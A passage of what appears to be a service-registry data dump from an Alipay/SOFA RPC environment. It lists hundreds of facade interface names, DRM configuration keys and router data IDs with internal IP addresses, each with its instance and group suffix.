EFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitDefinitionSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:xztest_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_BIC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pmc.common.service.facade.disney.serv.DynamicProcessService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstoreapp.common.service.facade.demo.TripleDemoTrigger:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.ProcessAdviceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciaasconnectorcore.facade.conn.LbConn:1.0:0000000003@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseamng.rate.pms.WorkOrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.OperatorQueryProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.amspm.core.plugin.config.drm.BizIdentityConfigDrmResource.enableRuleParser,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.checkroute.common.service.facade.AttackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.45.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:wshopbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.DepositbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.alipay.api.query.ZlcRepayPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.30.195.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.bankcard.facade.FirstPayQueryServicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zskynetTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.CashierPayChannelUseRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.rule.CondManageService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acappcore.common.service.facade.buildpack.BuildpackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAYBIZCORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.242.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcardcore.common.service.facade.mpcard.McardDepositFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.SlowSqlTarsSqldiagAllWealthRecentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_restoreLpaOverDraftProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.UserProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:chatTabProcessCallbackManagerImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.decision.DecisionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custdecision.service.facade.XflushErrorNpeStatisticsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.171.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:mif_shop_industry_evaluate_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.biz.service.msgbroker.facade.FortuneAccountMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.comment.CommentFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:girisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.secondaryBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finauth.common.service.facade.account.service.MYBKSettleAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.productx.facade.ProductTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.dal.logsim.jarextractor.OeEmulatorAppJarExtractFacadeDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.135.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.risk.api.RiskAdvicePolicyService:1.0:forsecuritycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.156.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.monitor.CustomerServiceMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.ProductUpgradeConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:CONTAINER@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.user.UserActiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.clientSupportGray,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alipaymember.common.service.facade.family.service.FamilyBenefitExchangeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.MBServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:certifymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.TrainingTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alphasecmng:name=com.alipay.assay.web.home.drm.PermissionControlDrm.exclusiveEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.userrelation.UserRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iotDeviceJoinApplyCheck_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.unicom.UnicomRedPacketService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.FundTradeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaappdist.common.service.facade.user.UserContactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.document.api.ShowDocumentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.ClaimReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.shadowQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataquery.common.service.facade.PaymentQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.advert.LifeAdmgrOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IMKTEYECN#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.inputRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promox.facade.crowd.CrowdQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.ProphetSeasonLevelStarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graycore.common.service.facade.api.bizroute.AppMetaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finfocoreSceneProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:rzmsmop-lifecoresff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fininsightmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:zmcreditmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.atgoperation.facade.api.session.UserSessionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdmp.facade.PcdmpMatterManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2MainTransactionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lendpofprod.common.service.facade.loanapi.user.UserReleaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.AstAllocTaskManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.grayprod.change.drm.ChangePolicy.phaseExecutePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:mtmallcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipss.service.facade.api.AseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchantsettle.service.common.facade.SettleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceListQueryApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.agentfund.api.AftransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.match.api.MatchAppointmentAggrModelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.core.config.drm.CacheRefreshDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.whiteInstIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.unicom.UnicomDataAwardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.character.api.UserCharacterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditprerec.service.CaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:changefree@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.certifycenter.service.facade.opencertify.OpenCertifyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkmth.common.service.facade.service.DataAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.submit.ModelSubmitOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.fund.facade.api.MrchTransBookReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.enterTairSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.mobile.component.common.facade.appcenter.MiniAppPackageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dassmeta.zdic.service.ZdicConfigInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfmng.service.facade.fundboss.FBLinkReconFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstm.common.service.facade.paybox.SmartWhiteBoxRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_INNERTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.routeclient.interfacename:mobilechat#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-1000012@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchpay.common.service.facade.bptb.BatchPayQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.tmall.aself.promition.client.alipay.AlipayLampService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.facade.fund.api.RecoverAccidentalItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_TSM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.VoiceToTextFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.globalfacade.support.CommonFacadeInvoker:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.audit.MiniAppAuditRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_MOBILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.filterPS,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:${targetserver.type}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:antfeaturemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oasis.common.service.facade.cluster.manager.ForMonitorJsonService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchiswisdom.report.common.service.facade.api.outline.OutlineGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:bkassetmore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finorm.biz.facade.api.RiskEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.route.drm.SchedulerRuleResource.refreshProxy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zappinfo.facade.query.NcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:financingcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.commandcenter.commandcenterDataSource_OB_gc.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.drm.MftransPrepubWhiteListDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaappdist.common.service.facade.miniapp.IotMiniAppDistributionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.fund.facade.api.MoneyFundWithdrawCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:qagraphknowledge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipPromoteResource.promoteSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.openapi.metadata.MetadataOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.modelcenter.common.service.model.sm.SimpleModelVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcalm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.datapoint.LocalDataPointValidateService:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.echo:name=com.alipay.echo.platform.core.drm.EchoRecordConfigDrm.recordConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.175.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.operator.common.service.facade.OperatorRelIpRoleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.uniform.facade.UniformApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payline.common.service.qrcode.facade.DataDecisionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:checkservice-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.claim.facade.AssetClaimApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.110.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.regtech.facade.RegSensorProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.repay.DeferRepayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mirrorprod.facade.opscloud.OpscloudFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.decisionx.engine.common.api.DecisionStatusService:1.0:uioservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpdcore:name=com.alipay.fin.pdcore.core.service.innerclient.master.drm.MasterConfigDRM.devSyncTestIp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.core.service.guardian.TransferModelCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.algoevaluator.common.service.FlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_UNIFIEDLIMIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bktranscore.common.service.facade.BatchTransServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mytradeconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.McenterSplitRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.FundIdentityAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.activity.ActivityHaMsManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.alipayauth.AlipayAuthPreEwcVerifyFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.CodeAttackConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_C_PAGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.csbizcenter.facade.CsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.innertrans.facade.api.InnerAccountReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.CleanFeedBackDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SecureQuestionVerifyService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.128.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certify.service.facade.OrgCertifyActionV2Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:vouchercore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.MigrateOBDoubleReadDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:merchantsettle@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pccontractprod.common.service.facade.api.contract.ContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_ALIPAY-RULE-ENGINE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercenter.biz.service.openmq.route.MqInnerRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.withdraw.api.DishonorProcQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:testOps@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:antlegalchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.integration.mfinquotationprod.FundQuotationFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.card.BackstageCardTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.common.service.facade.DsCampRelationConfServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.message.AppNotifyCommonSendServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqapi.facade.yqapi.SlsContentHandlerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.playcenter.PlayTemplateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_EXRATECENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.payment.api.PaymentHisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.81.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:pubbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.namelist.WhiteListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.70.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paygrowth.common.service.facade.channel.ChannelOperationExecuteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:frontQualityCheckService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.recommend.TransportRecommendBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecore.service.facade.RefundFacadeiii:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.apcontainersrv.application.endpoint.facade.rest.ProjectQuotaService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfpcenter:name=com.alipay.zoneclient.internal.DynamicLdc